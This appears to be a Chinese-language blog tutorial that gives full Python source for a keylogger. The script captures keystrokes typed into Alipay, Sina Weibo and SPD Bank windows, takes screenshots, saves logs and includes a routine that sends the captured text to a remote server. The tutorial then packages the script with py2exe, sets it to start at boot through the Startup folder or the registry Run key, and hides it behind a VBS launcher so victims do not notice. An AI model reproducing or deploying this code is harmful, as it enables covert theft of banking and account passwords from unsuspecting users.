本文以一段简单的监听鼠标、键盘事件的程序,实现获取用户的输入(比如登录某些网站的账号、密码)的功能。经测试,对于一台“裸奔”的电脑,完全能获取到用户输入的任何信息;但是如果安装了杀毒软件,就够呛了。具体实现方法如下:
一、代码部分:获取用户输入信息,并与截图一起保存到XX目录下
code:
-
- import pythoncom
- import pyHook
- import time
- import socket
- from PIL import ImageGrab
-
- def send_msg_to_server(msg):
- host=""
- port=1234
- buf_size=1024
- addr=(host,port)
- if len(msg)>0:
- tcp_client_sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- tcp_client_sock.connect(addr)
- info=time.strftime(‘%Y%m%d%H%M%S‘,time.localtime(time.time()))+‘ from ‘+socket.gethostname()+‘:‘
- tcp_client_sock.sendall(info+msg)
- tcp_client_sock.close()
-
- def write_msg_to_txt(msg):
- f=open(‘D:/workspace/mytest/pyhook/media/monitor.txt‘,‘a‘)
- f.write(msg+‘\r\n‘)
- f.close()
-
- def onMouseEvent(event):
-
- global MSG
- if len(MSG)!=0:
-
- write_msg_to_txt(MSG)
- MSG=‘‘
- pic_name = time.strftime(‘%Y%m%d%H%M%S‘,time.localtime(time.time()))
-
- pic = ImageGrab.grab()
- pic.save(‘D:/workspace/mytest/pyhook/media/mouse_%s.png‘ % pic_name)
- return True
-
- def onKeyboardEvent(event):
-
- global MSG
- title= event.WindowName.decode(‘GBK‘)
-
- if title.find(u"支付宝") != -1 or title.find(u‘新浪微博‘)!=-1 or title.find(u‘浦发银行‘)!=-1:
-
- if (127 >= event.Ascii > 31) or (event.Ascii == 8):
- MSG += chr(event.Ascii)
- if (event.Ascii == 9) or (event.Ascii == 13):
-
- write_msg_to_txt(MSG)
- MSG = ‘‘
-
- pic_name = time.strftime(‘%Y%m%d%H%M%S‘,time.localtime(time.time()))
- pic = ImageGrab.grab()
-
- pic.save(‘D:/workspace/mytest/pyhook/media/keyboard_%s.png‘ % pic_name)
- return True
-
- if __name__ == "__main__":
- MSG = ‘‘
-
- hm = pyHook.HookManager()
-
-
- hm.SubscribeMouseLeftDown(onMouseEvent)
- hm.HookMouse()
-
-
- hm.KeyDown = onKeyboardEvent
- hm.HookKeyboard()
-
-
- pythoncom.PumpMessages()
二、用py2exe将脚本打包:
新建一个py文件setup.py,内容如下:
- from distutils.core import setup
- import py2exe
- setup(console=["monitor.py"])
命令行执行以下命令:
三、将该程序设置为开机自动启动:
步骤①:
将需要开机启动的文件(创建一个快捷方式,然后)放到“开始/所有程序/启动”目录下
步骤②:
修改注册表:命令行— regedit ,然后到以下路径下:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
新建一个“字符串值”,然后编辑:设置exe文件所在路径
D:\workspace\mytest\pyhook\dist\monitor.exe
(以上两种方式启动monitor.exe的话,会弹出一个命令框,显示监听日志信息,这样的话,被监听的人一下就能发现了,可以试试下面这个方式)
步骤③:
新建一个 .vbs文件,内容如下:
1
2
|
setwscriptObj=CreateObject( "Wscript.Shell" )
wscriptObj.run“D:\workspace\mytest\pyhook\dist\monitor.exe",0
|
双击运行该vbs文件,则monitor.exe就在后台启动了(不会弹出一个大黑框)。
然后参考法①、② 把该vbs设置成开机启动即可。